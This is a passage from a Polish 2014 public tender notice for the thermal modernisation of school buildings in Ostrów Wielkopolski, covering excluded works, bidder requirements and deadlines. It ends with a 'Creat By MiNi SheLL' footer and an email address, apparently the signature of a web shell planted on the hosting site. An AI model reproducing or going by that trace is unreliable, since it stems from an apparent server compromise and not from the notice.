    1.   Projekt budowlany zamienny z kwietnia 2014r. Termomodernizacja i przebudowa budynków
          przy ul. Wolności 10 i 12 w Ostrowie Wielkopolskim  ETAP VI budynek nr 10 - załącznik nr 8
    2.   Przedmiar robót - (budynek przy ul. Wolności 10) - załącznik nr 9.1
          - roboty budowlane 
   3.    Przedmiar robót - (budynek przy ul. Wolności 10) - załącznik nr 9.2
          - roboty instalacyjne 
   4.    Specyfikacja techniczna wykonania i odbioru robót - załącznik nr 10. 

UWAGA: 
Zakres rzeczowy dostaw i robót nie objętych zamówieniem (ETAP-VI) 

L.p.	Zakres	ilość	UWAGI!
1	2	3	4
1.	Dostawa,  montaż  foteli  Sali  widowiskowej	148  [szt.]	
2.	Dostawa,  montaż,  podłączenie  i  uruchomienie  jednostek  zewnętrznych  klimatyzacyjnych	2  szt.	
3.	Dostawa,  montaż  i  uruchomienie urządzeń  do  bezprzewodowego  dostępu  do  monitoringu i  kontroli  systemów  klimatyzacji  zamontowanych  w  budynku  z  pomieszczenia  obsługi  technicznej  Zamawiającego  za  pośrednictwem  tableta  i  komputer  PC  -  AC  Mobile  Control  (bramka  komunikacyjna  +  aplikacja).	2  [kpl.]	
4.	Podjazd  dla  niepełnosprawnych	20,087  [m2]	Docelowo planowana  na  rok  2015  winda  panoramiczna 
z  możliwością  przewozu  osób  niepełnosprawnych  w  szczycie  budynku  od  strony  południowej  obsługująca  wszystkie  kondygnacje.
5.	Platforma  przyścienna  dla  niepełnosprawnych  na  poziom  parteru	1  [kpl.]	Docelowo planowana  na  rok  2015  winda  panoramiczna 
z  możliwością  przewozu  osób  niepełnosprawnych  w  szczycie  budynku  od  strony  południowej  obsługująca  wszystkie  kondygnacje.
6.	Urządzenia  systemu  sygnalizacji  napadu  
i  włamania	1  [kpl.]	
7.	Urządzenia  instalacji  monitoringu  wizyjnego	1  [kpl.]	
8.	Przełożenie  posadzek  z  parkietu  dębowego	300,999  [m2]	
9.	Docieplenie  stropu  poddasza  nad  częścią  północną  od  str.  klatki  schodowej	141  [m2]	
10.	Trzecia  warstwa  wełny  mineralnej  gr.  10  [cm]  nad  salą  widowiskową	257,659  [m2]	
11.	Ściana  oddzielnie  pożarowego  REI 120  
na  poziomie  poddasza	34,704  [m2]	
12.	Ławy  kominiarskie	14  [szt.]	
13.	Stopnie  kominiarskie  	70  [szt.]	
14.	Dostawa  i  montaż  oraz  uruchomienie  profili  schodowych,  nakładanych  szerokich,  podświetlanych  z  numerem  rzędu  (LED)  (np.  firmy  SOLED)	26  [kpl.]	
15.	Dostawa,  montaż  i  uruchomienie  kontrolera  sygnału  DMX +  komputera  z  oprogramowaniem  do  sterowania  oświetleniem  (przeszkolenie  do  obsługi  4  pracowników  Zamawiającego)	1  [kpl.]	
16.	Wymiennik  ciepła  dla  c.w.u.,  uzgodnienia  
i  negocjacje  z  OZC  S.A.	1  [kpl.].</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.40.00.00-1, 45.30.00.00-0, 52.22.32.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 20 000,00 zł. Slownie:dwadzieściatysięcyzłotych</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W/g formuły spełnia nie spełnia zgodnie z zał. nr 2</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w/g formuły spełnia nie spełnia z zał.nr 2</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w/g formuły spełnia nie spełnia na podstawie załączonych oświadczeń.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w/g formuły spełnia nie spełnia na podstawie załączonych oświadczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w/g formuły spełnia nie spełnia na podstawie załączonych oswiadczeń.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Załącznik nr 4 oświadczenie o powierzeniu wykonania części zamówienia podwykonawcom.
2.Wypełniony kosztorys ofertowy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy wymagają formy pisemnego aneksu pod rygorem      nieważności i mogą zostać dokonane, o ile nie stoją w sprzeczności z regulacjami zawartymi w ustawie Prawo zamówień publicznych.
2.	Zmiany, o których mowa w ust. 2 mogą:
1)	dotyczyć przedłużenia terminu, o którym mowa w § 2 ust. 1 w przypadku:
a)	zawieszenia robót przez zamawiającego,
b)	wystąpienia innych robót nieprzewidzianych przedmiotową umową, mogących mieć wpływ na pierwotny czas wykonania przedmiotu umowy,
c)	wystąpienia siły wyższej, o której mowa w § 11 ust. 3 pkt 1,
d)	zmiany dokumentacji projektowej,
o okres, w którym roboty będące przedmiotem zamówienia nie mogły być prowadzone,
2)	być związane ze zmianą przepisów prawa powszechnie obowiązującego, jeśli wpływa ona na zakres lub warunki wykonania przez strony świadczeń wynikających z umowy.
3.	Wystąpienie okoliczności, o których mowa w ust. 3 pkt 1, należy potwierdzić stosownymi wpisami do dziennika budowy, zaakceptowanymi przez inspektora nadzoru oraz niezwłocznie zgłosić pisemnie osobie, o której mowa w § 14 pkt 1.
4.	Ewentualne spory wynikłe na tle realizacji niniejszej umowy będą rozstrzygane przez Sądy Powszechne, właściwe miejscowo dla zamawiającego.
5.	Specyfikacja Istotnych Warunków Zamówienia w postępowaniu poprzedzającym zawarcie tej umowy stanowi jej integralną część.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsu.osw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespoł Szkół Usługowych ul.Wolności 12, 63-400 Ostrów Wielkopolski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2014 godzina 11:00, miejsce: Zespół Szkół Usługowych ul.Wolnosci 12 - sekretariat pokój 102 I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com